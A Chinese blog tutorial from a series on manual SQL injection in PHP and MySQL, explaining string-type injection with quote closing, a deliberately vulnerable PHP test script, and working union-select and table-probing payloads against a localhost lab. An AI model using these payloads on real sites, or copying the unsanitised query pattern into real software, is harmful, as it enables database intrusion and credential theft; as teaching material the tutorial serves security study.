SQL注入系列之PHP+Mysql手动注入(二)----字符型

最新推荐文章于 2024-04-03 18:00:00 发布
最新推荐文章于 2024-04-03 18:00:00 发布
阅读量7k 收藏 23
点赞数 7
分类专栏: SQL注入 文章标签: SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u011781521/article/details/57078109
版权

一、什么是字符型注入以及原理


1)字符型注入简介


字符串或串(String)是由数字、字母、下划线组成的一串字符。一般记为 s=“a1 a2 ···an ” (n>=0)。它是编程语言中表示文本的数据类型。


字符型注入就是把输入的参数当做字符串来对数据库进行查询,字符型注入在sql语句中都采用单引号括起来。



2)基本原理:

看看这条SQL语句

 
$query="select first_name from users where id='$_GET['id']'";

这句SQL的语句就是基于用户输入的id在users表中找到相应的first_name,正常用户当然会输入例如1,2等等。但是如果有人输入这样的内容呢?

1' union select database() #;

这样的话这句SQL语句就变成了这样

select first_name from users where id='1'unionselect database()#'

这样的话,我们不仅可以得到id=1的first_name,还可以得到当前数据库的相关信息,这是开发人员所没有想到的。以上只是一个简单的SQL注入的例子。 

从根本上讲,当开发人员对用户的输入过滤不严,造成了用户可以通过输入SQL语句控制数据库,就会产生SQL注入漏洞。


简而言之,基于字符型的SQL注入即存在SQL注入漏洞的URL参数为字符串类型(需要使用单引号表示)。


字符型SQL注入的关键—–单引号的闭合


MySQL数据库对于单引号的规则如下:

  • 单引号必须成对出现,否则数据库就会报错。
  • 如果两个单引号之间内容为空,数据库自动忽略。

应用程序数据库的字符型SQL语句为:

  • select * from tables where idproduct=’13’;
  • select * from tables where name=’fendo’;
  • select * from tables where data=’01/01/2017’;

二、字符型注入与数字型注入的区别


字符:除数字之外都是字符

数字:0-9


两种SQL语句的区别:


数字型: SELECT 列 FROM 表 WHERE 数字型列=值
字符型: SELECT 列 FROM 表 WHERE 字符型列=’值’


三、如何判断是否是字符型注入


测试注入语句是:


xx' and '1'=1--' 


xx' and '1=2--'


如果第一个页面正常,而使用第二个的时候页面出现错误则,该url可以进行字符型注入







四、字符型注实战


测试源码:

<?
$name=$_GET['username'];
$conn=mysql_connect("127.0.0.1","root","123");//连接mysql数据库
if($conn){
	echo "连接数据库成功!"; 
}//判断连接是否成功
echo "<br>";
mysql_select_db('fendo',$conn);//选择连接请求为conn的数据库(fendo)
$sql="select * from user where username = '$name'"; //字符型搜索语句
$result=mysql_query($sql);
while($row = mysql_fetch_array($result)){ 
	echo "用户ID:".$row['id']."<br >";
	echo "用户名:".$row['username']."<br >";
	echo "用户密码:".$row['password']."<br >";
	echo "用户邮箱:".$row['email']."<br >";
}
mysql_close($conn); //关闭数据库连接
echo "<hr>";
echo "你当前执行的sql语句为:"."<br >";
echo $sql;
?>


表数据:





当我们访问:http://localhost/sqltest/char.php?username=admin 时


执行的代码是:


$sql="select * from user where username = '$name'";

解析成SQL就是 select  * from user where username = 'admin' 执行结果为




进行SQL注入:


1.猜字段数


使用union select 1,2,3,4.... 去猜。这里为4是正确说明字段数为4。


http://localhost/sqltest/char.php?username=admin' union select 1,2,3,4 and '1'='1




爆出1,2,3 更换SQL语句得出当前的数据库名字与数据库版本


http://localhost/sqltest/char.php?username=admin' union select database(),version(),3,4 and '1'='1





2.猜表名


获取表名使用 '+and+(select+count(*)+from+表名)>0+and+''=' 这种格式。


http://localhost/sqltest/char.php?username=admin'+and+(select+count(*)+from+user)>0+and+''='




没报错说明存在user这个表。


3.猜密码


http://localhost/sqltest/char.php?username=admin' and password='fendo






码农致富
关注
  • 7
    点赞
  • 23
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PHP+MysqlSQL注入源码 下载
01-01
PHP+MysqlSQL注入源码、下载解压部署到环境中去就行了。
php mysql手动注入_SQL注入系列PHP+Mysql手动注入(三)----搜索(POST/GET)
weixin_42520573的博客
01-28 116
一、搜索注入简介与原理1)简介一些网站为了方便用户查找网站的资源,都对用户提供了搜索的功能,因为是搜索功能,往往是程序员在编写代码时都忽略了对其变量(参数)的过滤,而且这样的漏洞在国内的系统中普遍的存在:其中又分为POST/GET,GET的一般是用在网站上的搜索,而POST则用在用户名的登录,可以从form表单的method="get"属性来区分是get还是post。搜索注入又称为文本框注入...
sql注入学习笔记
qq_44897253的博客
12-02 3556
文章目录什么是sql注入sql注入的原理sql注入方法1.1数字注入1.2字符注入sql注入常见的绕过方式sqlmap的简单使用sql注入的危害sql注入的防范措施 什么是sql注入 sql注入是指web应用程序对用户输入的数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的sql语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。 sql注入的原理 sql注入攻击是通过操作输入来修改
字符注入报错注入
最新发布
Dug123456_的博客
04-03 1562
输入不同种的语句 显示的不同 存在sql漏洞输入1发现id=‘1’,所以为字符注入
SQL注入学习——sqli-labs闯关(Basic Challenges)
未完成的歌~的博客
07-28 2607
今天开始学习 SQL 注入的相关知识,通过 sqli-labs 靶场来练习。靶场地址SQL注入(SQL Injection)是一种常见的 Web 安全漏洞,攻击者通过构造SQL语句与后台数据库进行交互,达到获取或修改一些敏感数据,或者利用潜在的数据库漏洞进行攻击的目的。何为盲?盲就是在 sql 注入过程中,sql 语句执行后,查询的数据不能回显到前端页面上。此时,我们需要利用一些特殊的方法来得到数据,这个过程称之为盲。盲主要分为三类:基于布尔的 SQL 盲基于时间的 SQL 盲。........
SQL注入原理-字符注入
T1ngSh0w的博客
09-13 8186
SQL注入原理-字符注入
mysql手动注入_SQL注入系列PHP+Mysql手动注入(一)----字符
weixin_34650199的博客
01-19 242
一、什么是字符注入以及原理1)字符注入简介字符串或串(String)是由数字、字母、下划线组成的一串字符。一般记为 s=“a1 a2 ···an ” (n>=0)。它是编程语言中表示文本的数据类字符注入就是把输入的参数当做字符串来对数据库进行查询,字符注入在sql语句中都采用单引号括起来。2)基本原理:看看这条SQL语句$query="selectfirst_namefrom...
SQL 注入基础系列2——利用 SQL 漏洞绕过登录验证
weixin_37537965的博客
12-26 745
DVWA-&gt;SQL Injection //后台sql语句 select * from users where username='$name' and password='$pwd'; 当查询到数据表中存在同时满足 username 和 password 字段的数据时,会返回登录成功。例如,用户名为admin,密码为123时: //实际执行语句 select * from use...
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
01-08
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
so-sql-injections:Stack Overflow PHP问题中SQL注入漏洞
02-04
so-sql注入 Stack Overflow PHP问题中SQL注入漏洞 执照:麻省理工学院
mysql ii_Training: MySQL II
weixin_29268267的博客
02-07 108
首先关于SQL的select语句SELECT * FROM users WHERE username='$username'*代表着搜索全部,fromusername为在username表中搜索,where限定username为输入的值源代码截图我们可以看到表有三个关键字,分别是userid,username和password,因此在后面的构造时,也应该构造这三个参数。首先说原理(纠结了半天在大...
sql注入数字字符的原理 //(dvwa实战 sql injection low)
weixin_43749051的博客
03-04 1685
1、数字注入 当输入的参数为整形时,如果存在注入漏洞,可以认为是数字注入。 测试步骤: (1) 加单引号,URL:www.text.com/text.php?id=3’ 对应的sql:select * from table where id=3’ 这时sql语句出错,不符合sql语法,让数据库系统报错,如果没报错就说明 ‘ 被过滤了,这样不存在注入的可能。 (2) 加and 1=1 ,URL:www.text.com/text.php?id=3 and 1=1 对应的sql:select *
SQL注入---测试工程师必知必会
啊Sei的博客
06-02 1849
SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息
mysql注入ctf_BUUCTF[归纳]sql注入相关题目
weixin_42322347的博客
02-02 1554
这是我自己对于sql注入的部分ctf题的归纳,均来自buuctf的平台环境。[0CTF 2016]piapiapia我尝试了几种payload,发现有两种情况。第一种:Invalid user name第种:Invalid user name or password第一步想到的是盲或者报错,因为fuzz一波有一些是没有过滤掉的。对于后台的拦截我想到的可能是黑名单或者是正则表达式匹配。先不管,...
CTF-SQL注入
weixin_44770698的博客
06-16 4925
CTF-SQL注入题目整理
SQL注入
舌尖上的蛋炒饭的博客
05-26 1083
SQL注入 原理 我们要知道数据库中KaTeX parse error: Expected 'EOF', got '#' at position 2: 和#̲的区别 他们之间的区别用最直接…相当于直接显示数据。 1、#对传入的参数视为字符串,也就是它会预编译 select * from user where name = #{name} 比如我传一个csdn,那么传过来就是 select * from user where name = 'csdn' 2、$将不会将传入的值进行预编译 select *
mysql查询语句详解_mysqlselect查询语句详解
weixin_33990147的博客
01-25 243
在网站中一般的select 有时候满足不了需求。下文是select()用法的提升篇,希望对您有所帮助1,select查询的基本结构select字段from表where过滤条件groupby分组条件orderby排序条件having过滤的第条件limit限定结果条件;2,最简单的查询语句mysql>select*fromuser;+—-+———-+———-+———————+|id|u...
mysql C where语句_MySQL Where 条件语句介绍和运算符小结
weixin_42323034的博客
01-27 213
WHERE 条件有时候操作数据库时,只操作一些有条件限制的数据,这时可以在SQL语句中添加WHERE子句来规定数据操作的条件。语法:SELECT column,… FROM tb_name WHERE definitionWHERE 关键字后面接有效的表达式(definition),该表达式表示被操作的数据记录必须满足的条件。除 SELECT 外,WHERE 条件关键字可以用于任何 SQL 语法允...
sql手工注入漏洞测试(mysql数据库-字符)
06-28
在针对MySQL数据库的字符注入测试中,攻击者会尝试利用输入表单中的字符数据来破坏SQL语句的可靠性,进而获取对数据库的访问权限。 攻击者通常会使用一些SQL注入工具,例如SQLMap、Havij等,通过模拟输入表单来...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值